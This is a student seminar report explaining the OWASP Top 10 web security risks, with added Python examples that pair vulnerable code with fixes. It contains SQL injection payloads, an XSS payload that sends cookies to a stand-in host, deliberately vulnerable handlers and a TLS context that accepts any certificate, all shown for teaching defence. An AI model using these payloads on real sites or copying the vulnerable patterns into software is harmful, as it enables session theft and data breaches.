Page 1: Owasp Top 10

A SEMINAR REPORT ON "OWASP Top 10"

Submitted in partial fulfillment of the requirements for the award of the degree of BACHELOR OF TECHNOLOGY in Computer Science and Engineering

By SHIVAM PORWAL (131234040048)

Under the supervision of Er. SADIK KHAN

Department of Computer Science and Engineering, Institute of Engineering and Technology, BUNDELKHAND UNIVERSITY, JHANSI


CERTIFICATE

TO WHOM IT MAY CONCERN

This is to certify that Mr. SHIVAM PORWAL (131234040048), student of B. Tech (Computer Science and Engineering), final year (7th semester), has given a seminar on "OWASP Top 10".

Date:

Er. SADIK KHAN
Seminar Incharge
Lecturer, Computer Science & Engineering Dept., I.E.T. B.U. Jhansi


Acknowledgement

Whenever a module of work is completed successfully, a source of inspiration and guidance is always there for students. I hereby take the opportunity to thank all those persons who helped me in developing this seminar.

I would like to express my gratitude to Er. Sadik Khan, the seminar incharge, for the guidance and help I received from him.

I would also like to thank Er. B.B. Niranjan (Co-ordinator of CSE), Er. B.P. Gupta, Er. Vijay Kumar Verma, Dr. Lalit Kumar Gupta, Er. Anurag Kumar, Er. Akshay Saxena, Er. Hemant Rai and all other faculty members of the I.E.T. Computer Engineering Dept. for their timely and precious help.

SHIVAM PORWAL


TABLE OF CONTENTS

1. What is OWASP?
2. Introduction to OWASP Top 10
3. OWASP Top 10 List
4. Top 10 Vulnerabilities
5. Successful Attack & Risk Path
6. Risk Rating of OWASP Top 10
7. What's next for Developers?
8. What's next for Verifiers and Organizations?
9. Conclusion
10. References


1. What is OWASP?

The OWASP Foundation came online on December 1, 2001, and was established as a not-for-profit charitable organization in the United States on April 21, 2004, to ensure the ongoing availability of and support for OWASP's work. OWASP is an international organization, and the OWASP Foundation supports OWASP efforts around the world. OWASP is an open community dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted. All OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security. OWASP advocates approaching application security as a people, process, and technology problem, because the most effective approaches to application security include improvements in all of these areas. OWASP can be found at www.owasp.org.

OWASP is a new kind of organization. Its freedom from commercial pressures allows it to provide unbiased, practical, cost-effective information about application security. OWASP is not affiliated with any technology company, although it supports the informed use of commercial security technology. Like many open-source software projects, OWASP produces many types of materials in a collaborative and open way. The OWASP Foundation is a not-for-profit entity that ensures the project's long-term success.

Principles:
• Free and open
• Governed by rough consensus and running code
• Abide by a code of ethics
• Not-for-profit
• Not driven by commercial interests
• Risk-based approach


2. Introduction to OWASP Top 10

Every few years, OWASP releases the OWASP Top 10, a list of the ten most critical application security risks faced by developers and organizations, with the goal of helping developers and security teams better secure the applications they design and deploy. Because the risks to applications are always evolving, each release of the OWASP Top 10 is revised to reflect these changes, along with the techniques and best practices for avoiding and remediating the vulnerabilities. In addition to the OWASP Top 10 for web applications, OWASP has also created similar lists for Internet of Things vulnerabilities and for mobile security issues. The list is compiled by evaluating the overall severity of each risk as well as how frequently it occurs. Some risks may be rare but catastrophic when exploited, while others are common but easy to guard against.

Latest release, accepted worldwide (at the time of writing): OWASP Top 10 – 2013
Under construction (expected December 2016): OWASP Top 10 – 2016

How it works

The OWASP Top 10 for 2013 is based on 8 datasets from 7 firms that specialize in application security, including 4 consulting companies and 3 tool/SaaS vendors (1 static, 1 dynamic, and 1 with both). This data spans over 500,000 vulnerabilities across hundreds of organizations and thousands of applications. The Top 10 items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact.

Aim:

The primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas – and also provides guidance on where to go from here.


3. OWASP Top 10 List

FIGURE 1: OWASP TOP 10 – 2013 Vulnerabilities

FIGURE 2: Comparison between OWASP TOP 10 – 2013 and OWASP TOP 10 – 2010 Vulnerabilities


4. Top 10 Vulnerabilities

I. Injection

Injection heads the OWASP Top 10. It occurs when untrusted data is sent to an interpreter (a SQL database, an OS shell, an LDAP directory, and so on) as part of a command or query without being properly validated or escaped. SQL injection is the best-known case: the attacker's input is parsed as part of the query rather than as a value the query compares against. The idea is that the data fools the interpreter into either handing over data the attacker wants or executing commands that are hostile to the environment.

FIGURE 3: Injection Vulnerability
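The following is an added example, not code from the report or from OWASP: a login check against an in-memory SQLite database, written once with the query built by string concatenation and once with bound parameters. The table, the two accounts and the two payloads are constructed for the demonstration.

```python
# Added example, not code from the report: SQL injection against an in-memory
# SQLite database. The vulnerable string-built query sits beside the
# parameterized fix. Table, rows and payloads are constructed for this demo.
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed sample data: a users table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "correct horse"), (2, "bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Untrusted input is concatenated into the SQL text, so a quote in the
    # input ends the string literal and the rest is executed as query syntax.
    sql = (
        "SELECT id FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders fix the query structure; the driver sends the values
    # separately, so nothing in the input can change what the query does.
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# Two classic payloads: a tautology that makes the WHERE clause always true,
# and a comment sequence that discards the password check entirely.
TAUTOLOGY = "' OR '1'='1"
COMMENT_OUT = "alice'--"


def demo() -> dict:
    conn = setup_db()
    return {
        "vuln_tautology": login_vulnerable(conn, "alice", TAUTOLOGY),
        "vuln_comment": login_vulnerable(conn, COMMENT_OUT, "wrong"),
        "safe_tautology": login_safe(conn, "alice", TAUTOLOGY),
        "safe_comment": login_safe(conn, COMMENT_OUT, "wrong"),
        "safe_valid": login_safe(conn, "alice", "correct horse"),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: login succeeded = {result}")
```

With the vulnerable function, both payloads log in without knowing any password: the first turns the condition into `... AND password = '' OR '1'='1'`, the second into `username = 'alice'--...` with the rest of the query commented out. The parameterized version rejects both and still accepts the real credentials. Escaping the input by hand is the weaker fix; binding parameters (or a query builder/ORM that does so) is the one that holds up.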

II. Broken Authentication & Session Management

Broken Authentication and Session Management vulnerabilities allow attackers, often without any account of their own, to steal valuable data, especially Personally Identifiable Information. If authentication or session management has not been implemented properly, it may enable an attacker to steal passwords, session keys or tokens, or otherwise assume or exploit a user's identity.

FIGURE 4: Use Of Unknown Session ID
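The following is an added example, not code from the report or from any framework: a minimal server-side session store that shows three of the session-management controls this item is about, namely unguessable session IDs, rotation of the ID at login (which defeats the session-fixation attack where an attacker plants a known ID in the victim's browser), and idle expiry. The `SessionStore` class, the 15-minute timeout and the injectable clock are assumptions made for the demonstration.

```python
# Added example, not code from the report: a hypothetical session store
# with random IDs, rotation on login and idle expiry. IDLE_TIMEOUT and the
# injectable clock are assumptions so the expiry path can be exercised.
import secrets
import time

IDLE_TIMEOUT = 15 * 60  # seconds; an assumption for this example


class SessionStore:
    """Hypothetical server-side session store (not a framework API)."""

    def __init__(self, clock=time.time):
        self._sessions = {}   # session id -> {"user": str or None, "last_seen": float}
        self._clock = clock   # injectable so tests can move time forward

    def _new_id(self) -> str:
        # 32 bytes from the OS CSPRNG: neither a counter nor a timestamp,
        # so an attacker cannot predict a live ID.
        return secrets.token_urlsafe(32)

    def create(self) -> str:
        sid = self._new_id()
        self._sessions[sid] = {"user": None, "last_seen": self._clock()}
        return sid

    def get_user(self, sid: str):
        # Unknown or idle-expired IDs are rejected; a valid hit refreshes the timer.
        s = self._sessions.get(sid)
        if s is None:
            return None
        if self._clock() - s["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[sid]
            return None
        s["last_seen"] = self._clock()
        return s["user"]

    def login(self, old_sid: str, user: str) -> str:
        # Rotate: drop the pre-authentication ID (which an attacker may have
        # planted in the victim's browser) and issue a fresh one for the user.
        self._sessions.pop(old_sid, None)
        new_sid = self._new_id()
        self._sessions[new_sid] = {"user": user, "last_seen": self._clock()}
        return new_sid

    def logout(self, sid: str) -> None:
        self._sessions.pop(sid, None)


def fixation_demo() -> dict:
    """Attacker plants a session ID; victim logs in with it. Can the attacker use it?"""
    now = [1000.0]
    store = SessionStore(clock=lambda: now[0])
    planted = store.create()                  # attacker obtains a valid anonymous ID
    victim = store.login(planted, "alice")    # victim authenticates using that ID
    return {
        "planted_id_still_valid": store.get_user(planted) is not None,
        "victim_user": store.get_user(victim),
        "rotated": planted != victim,
    }


def expiry_demo():
    """A session left idle past IDLE_TIMEOUT no longer resolves to a user."""
    now = [1000.0]
    store = SessionStore(clock=lambda: now[0])
    sid = store.login(store.create(), "bob")
    now[0] += IDLE_TIMEOUT + 1
    return store.get_user(sid)
```

Because `login` discards the old ID, the attacker's planted ID stops working the moment the victim authenticates. The store says nothing about how the ID reaches the browser; in a real deployment the cookie carrying it also needs the `Secure` and `HttpOnly` flags so it is neither sent in clear text nor readable by script (which is what the XSS item below would otherwise steal).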


III. Cross-Site Scripting XSS

Cross-Site Scripting, often shortened to XSS, occurs when an application includes untrusted data in a web page without proper validation or escaping, so that the victim's browser executes it as script. Applications that accept user input but do not control how it is output are highly vulnerable to XSS. If successful, XSS allows the attacker to take over a user's session, deface a website, or redirect the user to another site (often one hosting further hostile code). There are three different kinds of XSS attacks, referred to as Stored XSS, Reflected XSS, and DOM-based XSS.

FIGURE 5: Cross Site Scripting Vulnerability
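The following is an added example, not code from the report: a search-results page that reflects the query back to the user, first rendered without any output encoding and then with encoding for the HTML body context, plus the extra scheme check that an `href` attribute needs. The template and the cookie-stealing payload are constructed for the demonstration.

```python
# Added example, not code from the report: reflected XSS in a search results
# page, the vulnerable render beside the output-encoded one, plus the extra
# check an href attribute needs. Template and payload are constructed.
import html

# Constructed payload: ships the session cookie to the attacker if it runs.
PAYLOAD = '<script>location="http://evil.example/?c="+document.cookie</script>'


def render_results_vulnerable(query: str) -> str:
    # Untrusted input is dropped straight into the HTML body.
    return f"<h1>Results for {query}</h1>"


def render_results_safe(query: str) -> str:
    # Output encoding for the HTML body context: &, <, >, " and ' become
    # entities, so the browser displays the text instead of parsing markup.
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def render_link_safe(url: str) -> str:
    # Attribute context needs encoding *and* a scheme check: escaping alone
    # does nothing against href="javascript:...".
    if not url.lower().startswith(("http://", "https://")):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">open</a>'


def contains_markup(rendered: str) -> bool:
    """True if a raw <script ...> tag survived into the output."""
    return "<script" in rendered.lower()
```

The same output-time encoding fixes Stored XSS, since what matters is the context the data is written into, not where it came from. DOM-based XSS has to be fixed in the client-side code instead, by writing untrusted strings through safe sinks such as `textContent` rather than `innerHTML`.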

IV. Insecure Direct Object References

Insecure Direct Object References occur when an application exposes a reference to an internal implementation object, such as a file, directory, or database key, and authorization for that object is not properly enforced. If no access control check or other protection is in place, an attacker can manipulate that reference to access data they are not authorized for, such as other users' records or, where the reference selects a privileged resource, administrative functionality.

V. Security Misconfiguration

When security processes and practices are not correctly followed or implemented, security misconfigurations (default accounts, unnecessary services, verbose error messages, unpatched software) can easily be used by attackers to find weak areas that give them access to privileged data. The configuration of the whole application environment, including servers, frameworks, platforms, etc., needs to be properly defined, implemented and controlled, or it can lead to security holes.

VI. Sensitive Data Exposure

When security controls like TLS (SSL/HTTPS) are not properly implemented, data can be leaked or stolen through a Sensitive Data Exposure vulnerability. Sensitive data such as Personally Identifiable Information, including financial and banking details, tax IDs, and passwords, can be at risk if not correctly secured. Applications should ensure that they authenticate access, encrypt data at rest and in transit, and ensure the integrity of data in the transport layer. A failure to do so may allow weak (and exploitable) algorithms to be used, and may leave clients accepting expired or forged certificates, leading to a privacy violation.
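The following is an added example, not code from the report: two of the controls this item asks for, written with the Python standard library only. The first builds a TLS client context that refuses protocol versions below 1.2 and refuses unverified certificates (beside the anti-pattern that silently accepts expired or forged ones); the second stores passwords as salted PBKDF2 hashes and compares them in constant time. The iteration count is an assumption; nothing here touches the network.

```python
# Added example, not code from the report: a hardened TLS client context
# beside the insecure one, and salted password hashing with a constant-time
# comparison. PBKDF2_ITERATIONS is an assumption; stdlib only, no network.
import hashlib
import hmac
import os
import ssl


def make_tls_context() -> ssl.SSLContext:
    # create_default_context() already verifies the chain and the hostname;
    # pin the floor to TLS 1.2 so legacy protocols and suites are refused.
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


def insecure_tls_context() -> ssl.SSLContext:
    # The anti-pattern: any certificate, expired or forged, is accepted.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def context_is_hardened(ctx: ssl.SSLContext) -> bool:
    return (
        ctx.verify_mode == ssl.CERT_REQUIRED
        and ctx.check_hostname
        and ctx.minimum_version >= ssl.TLSVersion.TLSv1_2
    )


PBKDF2_ITERATIONS = 600_000  # assumption; raise it as hardware gets faster


def hash_password(password: str, salt: bytes = b"") -> str:
    # Per-user random salt plus a slow KDF: equal passwords get different
    # hashes, and each offline guess costs the attacker 600k SHA-256 rounds.
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False  # refuse records hashed with anything weaker
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    # compare_digest does not leak how many leading bytes matched via timing.
    return hmac.compare_digest(dk.hex().encode(), dk_hex.encode())
```

The stored record carries the algorithm, the iteration count and the salt, so the count can be raised later and old records re-hashed at the user's next login. The TLS context is what an HTTP client should be handed for every outbound call; disabling verification "to make it work" is exactly the failure the paragraph above describes.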

VII. Missing Function Level Access Control

Most web applications verify function-level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server each time a function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization.
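The following is an added example, not code from the report, serving both item IV (Insecure Direct Object References) and item VII (Missing Function Level Access Control): an invoice lookup that trusts the client-supplied ID beside one that checks ownership on the server, and a role check applied to an admin-only function whether or not the UI ever showed the user a link to it. The users, roles and invoices are constructed data and the handlers are hypothetical.

```python
# Added example, not code from the report: server-side access control checks
# for sections IV (object-level, IDOR) and VII (function-level). Users, roles
# and invoices are constructed data; the functions are hypothetical handlers.
import functools

INVOICES = {
    1001: {"owner": "alice", "total": 120.0},
    1002: {"owner": "bob", "total": 75.5},
}
ROLES = {"alice": "user", "bob": "user", "carol": "admin"}


class Forbidden(Exception):
    pass


def get_invoice_vulnerable(current_user: str, invoice_id: int) -> dict:
    # Looks the record up by the client-supplied key and never asks who owns
    # it, so changing ?id=1001 to ?id=1002 hands Alice Bob's invoice.
    return INVOICES[invoice_id]


def get_invoice_safe(current_user: str, invoice_id: int) -> dict:
    # Object-level check: the reference must belong to the requester
    # (admins may read everything). Missing and foreign IDs get the same
    # answer so the caller cannot enumerate which IDs exist.
    inv = INVOICES.get(invoice_id)
    if inv is None or (inv["owner"] != current_user and ROLES.get(current_user) != "admin"):
        raise Forbidden(f"{current_user} may not read invoice {invoice_id}")
    return inv


def requires_role(role: str):
    # Function-level check, enforced on every server-side call, regardless
    # of whether the UI hid the menu entry from this user.
    def decorator(fn):
        @functools.wraps(fn)
        def wrapper(current_user: str, *args, **kwargs):
            if ROLES.get(current_user) != role:
                raise Forbidden(f"{current_user} lacks role {role}")
            return fn(current_user, *args, **kwargs)
        return wrapper
    return decorator


@requires_role("admin")
def list_all_users(current_user: str) -> list:
    return sorted(ROLES)


def allowed(fn, *args) -> bool:
    """True if the call is permitted, False if the access check rejects it."""
    try:
        fn(*args)
        return True
    except Forbidden:
        return False
```

The two checks are independent: a user who legitimately has access to the invoice function still must not see other owners' invoices, and hiding the "all users" link from ordinary accounts does nothing once someone requests the URL directly. Both decisions are made from the server-side session, never from a role or owner field supplied by the client.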

VIII. Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery attacks, often shortened to CSRF, make a logged-in victim's browser send a forged HTTP request to a vulnerable application. Because the browser automatically attaches the victim's cookies and any other stored authentication information, the request appears legitimate to the application, which carries it out as if the victim had intended it.
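The following is an added example, not code from the report: the synchronizer-token defence against CSRF. The token is an HMAC of the session ID under a server secret, so a request forged from another site, which carries the victim's cookie but has no way to read the token, is rejected. The request dictionary, the handler and the session ID are constructed for the demonstration and are not any framework's API.

```python
# Added example, not code from the report: synchronizer-token CSRF defence.
# The request dict and the transfer handler are hypothetical; SERVER_SECRET
# would normally be loaded from configuration rather than generated here.
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)  # assumption: generated at startup


def csrf_token_for(session_id: str) -> str:
    # Binding the token to the session means a token captured from the
    # attacker's own session is useless against the victim's.
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_funds(request: dict) -> str:
    """request = {"cookies": {"session": sid}, "form": {"to", "amount", "csrf"}}"""
    sid = request.get("cookies", {}).get("session")
    if not sid:
        return "rejected: no session"
    submitted = request.get("form", {}).get("csrf", "")
    expected = csrf_token_for(sid)
    if not hmac.compare_digest(submitted.encode(), expected.encode()):
        return "rejected: bad csrf token"
    form = request["form"]
    return f"transferred {form['amount']} to {form['to']}"


def demo() -> tuple:
    sid = "victim-session-id"  # constructed
    # Legitimate form: the page rendered for this session embedded its token.
    legit = {
        "cookies": {"session": sid},
        "form": {"to": "alice", "amount": "10", "csrf": csrf_token_for(sid)},
    }
    # Attacker's page auto-submits a form to our site; the browser attaches
    # the cookie, but the attacker cannot read the per-session token.
    forged = {
        "cookies": {"session": sid},
        "form": {"to": "attacker", "amount": "1000", "csrf": ""},
    }
    return transfer_funds(legit), transfer_funds(forged)
```

The token must be delivered in the page (a hidden form field or a header set by the application's own script), never in a cookie on its own, since the cookie is exactly what the attacker's request gets for free. Marking the session cookie `SameSite` is a useful second layer but does not replace the token on browsers that ignore the attribute.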

IX. Using Components with Known Vulnerabilities

Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts.
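The following is an added example, not code from the report: a small audit of a pinned dependency list against an advisory table, the kind of check that belongs in a build pipeline so a vulnerable component is caught before it ships. Both the requirements text and the advisory entries are constructed for illustration; they name no real package and no real advisory.

```python
# Added example, not code from the report: audit pinned dependencies against
# an advisory table. Package names and affected ranges are constructed for
# illustration and correspond to no real package or advisory.

REQUIREMENTS = """\
# constructed requirements file
acme-templating==2.3.1
acme-xmlparse==1.0.4      # parses untrusted uploads
acme-httpclient==4.2.0
acme-imaging
"""

# Constructed advisories: package -> list of (first affected, first fixed).
ADVISORIES = {
    "acme-xmlparse": [("1.0.0", "1.0.5")],
    "acme-httpclient": [("3.0.0", "4.1.0")],
}


def parse_version(v: str) -> tuple:
    # Numeric tuple comparison; enough for the dotted versions used here.
    return tuple(int(p) for p in v.split("."))


def parse_requirements(text: str) -> dict:
    """name -> pinned version, or None when the line carries no ==pin."""
    pins = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        name, _, ver = line.partition("==")
        pins[name.strip().lower()] = ver.strip() or None
    return pins


def audit(pins: dict, advisories: dict = ADVISORIES) -> dict:
    """Flag pinned versions inside an affected range and components with no pin at all."""
    report = {"vulnerable": [], "unpinned": []}
    for name, ver in sorted(pins.items()):
        if ver is None:
            report["unpinned"].append(name)   # cannot be audited, and drifts on each install
            continue
        for first_bad, fixed in advisories.get(name, []):
            if parse_version(first_bad) <= parse_version(ver) < parse_version(fixed):
                report["vulnerable"].append((name, ver, fixed))
    return report
```

The check only works on what it can see, which is why the unpinned entry is reported alongside the vulnerable one: a component with no fixed version cannot be matched against any advisory and may change from one deployment to the next. Real pipelines feed a maintained advisory database into the same comparison and fail the build on any hit.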

X. Unvalidated Redirects and Forwards

Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

FIGURE 6: A User Redirected To a Malware Website
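The following is an added example, not code from the report: validation of a post-login `?next=` parameter before the application issues the redirect. The allowed host name and the sample URLs are constructed for the demonstration.

```python
# Added example, not code from the report: validating a post-login ?next=
# parameter before issuing the redirect. ALLOWED_HOSTS is an assumption for
# the application's own host name; the sample URLs are constructed.
from urllib.parse import urlparse

ALLOWED_HOSTS = {"app.example.com"}


def redirect_vulnerable(next_url: str) -> str:
    # Whatever arrived in ?next= becomes the Location header.
    return next_url


def safe_redirect_target(next_url: str, default: str = "/") -> str:
    """Return a local path to redirect to, or `default` if next_url is unsafe."""
    parsed = urlparse(next_url)
    # javascript:, data: and every other non-HTTP scheme are refused outright.
    if parsed.scheme and parsed.scheme.lower() not in ("http", "https"):
        return default
    # Absolute and protocol-relative (//host) URLs must name our own host.
    # hostname strips userinfo, so "http://app.example.com@evil.example/"
    # is seen as evil.example, not as the allowed host.
    if parsed.netloc and (parsed.hostname or "").lower() not in ALLOWED_HOSTS:
        return default
    # Backslashes: some browsers treat "/\evil.example" like "//evil.example".
    if "\\" in parsed.path or not parsed.path.startswith("/"):
        return default
    # Re-emit only the path and query that were inspected, never the caller's
    # scheme or host, so the redirect can only land on this application.
    target = parsed.path
    if parsed.query:
        target += "?" + parsed.query
    return target
```

The safe version answers "where on this site may I send the user?" rather than "does this URL look evil?", which is why it rebuilds the target from the path instead of passing the parameter through. The same rule applies to server-side forwards: map a parameter to a fixed set of internal pages rather than forwarding to whatever path the client supplied.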


5. Successful Attack & Risk Path

FIGURE 7: A Successful Attack process

Figure 7 illustrates a successful attack in flowchart form. Threat agents (attackers) launch a series of attack vectors, i.e., methods by which access to the system is gained; the attack vectors can be web pages, viruses, e-mail attachments, instant messages, etc. One of the attack vectors finds a security weakness (e.g., weak authentication, lack of encryption, lack of data validation). There is a failure in one of the security controls (physical, procedural, technical, legal or regulatory) that would otherwise stop the attack. The attack has a technical impact, such as a loss of confidentiality, integrity, availability, or accountability. Finally, the attack has a business impact, such as financial damage, non-compliance, privacy violation, or damage to the organization's reputation.


6. Risk Rating of OWASP Top 10

OWASP's risk ratings are shown in Figure 8. Each risk is rated according to exploitability, prevalence, detectability, and impact, and the risks are listed in order of seriousness from the top to the bottom of the chart.

FIGURE 8: OWASP TOP-10 Risk Rating Table

By putting flaws into the Top 10 format, an organization can calculate risk factors and gain a framework for reducing its overall risk exposure. The OWASP Top 10 covers a lot of ground, but there are other important application security risks that are constantly being discovered, and many vulnerabilities have yet to be identified.


7. What's next for Developers?

"SECURE CODING". No application is completely secure, but adhering to the following principles will minimize risk:
• Minimize the attack surface area (plug the holes and minimize the access points).
• Establish and implement secure defaults, such as password expiration and session timeouts.
• Implement the principle of least privilege: do not give users access to things they do not need to do their jobs.
• Implement defence in depth: re-authentication for sensitive operations, anti-forgery tokens, indirect object references, so that no single control is the only line of defence.
• Applications should fail securely.
• Do not trust services or third parties.
• Implement separation of duties (e.g., an admin is not an auditor, and vice versa).
• Avoid security by obscurity ("hiding" is only a temporary fix).
• Keep security simple: complex controls get misconfigured and bypassed.


8. What’s next for Verifiers and Organizations?

To verify the security of a web application you have developed, or one you are considering purchasing, OWASP recommends that you review the application's code (if available) and test the application as well. OWASP recommends a combination of secure code review and application penetration testing whenever possible, since that lets you leverage the strengths of both techniques, and the two approaches complement each other. Tools that assist the verification process can improve the efficiency and effectiveness of an expert analyst. OWASP's assessment tools are focused on helping an expert become more effective, rather than trying to automate the analysis process itself.

Organizations must establish an effective capability for securing their applications. Given the staggering number of applications and lines of code already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities. OWASP recommends that organizations establish an application security program to gain insight and improve security across their application portfolio. Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, and business and executive management.

FIGURE 9: Vulnerability Scanners

Figure 9 lists some of the more popular vulnerability scanners on the market. Vulnerability scanners are available as commercial tools, as freeware and open source tools, and as software-as-a-service tools.


9. Conclusion

The Top 10 covers a lot of ground, but there are many other risks you should consider and evaluate in your organization. Some of these have appeared in previous versions of the Top 10, and others have not, including new attack techniques that are being identified all the time. The primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high-risk problem areas, and also provides guidance on where to go from here.

CREATE A REMEDIATION PLAN

1. Identify assets and risks:
• Obtain a full understanding of what you own (tangible and intangible).
• Obtain a full understanding of the risks associated with those assets.
2. Conduct a gap analysis and prioritize risks:
• Determine the biggest risks to your most valuable assets.
• Prioritize the risks.
• Draft and communicate those risks in order (i.e. high/medium/low) to the organization.
3. Planning and execution:
• Draw up the remediation plan (budget, technology, team, timeframe).
• Publish the plan and execute it.
4. Track, monitor, and improve the plan. This step will be time-consuming (how long it takes depends on the gap analysis). This is an ongoing process; the program is never finished; it restarts and can always be improved. It is important to manage costs, time, and resources for solid execution.


10. References

A. Jon Panella, "Web Application Security and the OWASP Top 10" (whitepaper), SapientNitro.
B. OWASP, report on the OWASP Top 10.
C. IBM developerWorks, "OWASP Top 10".

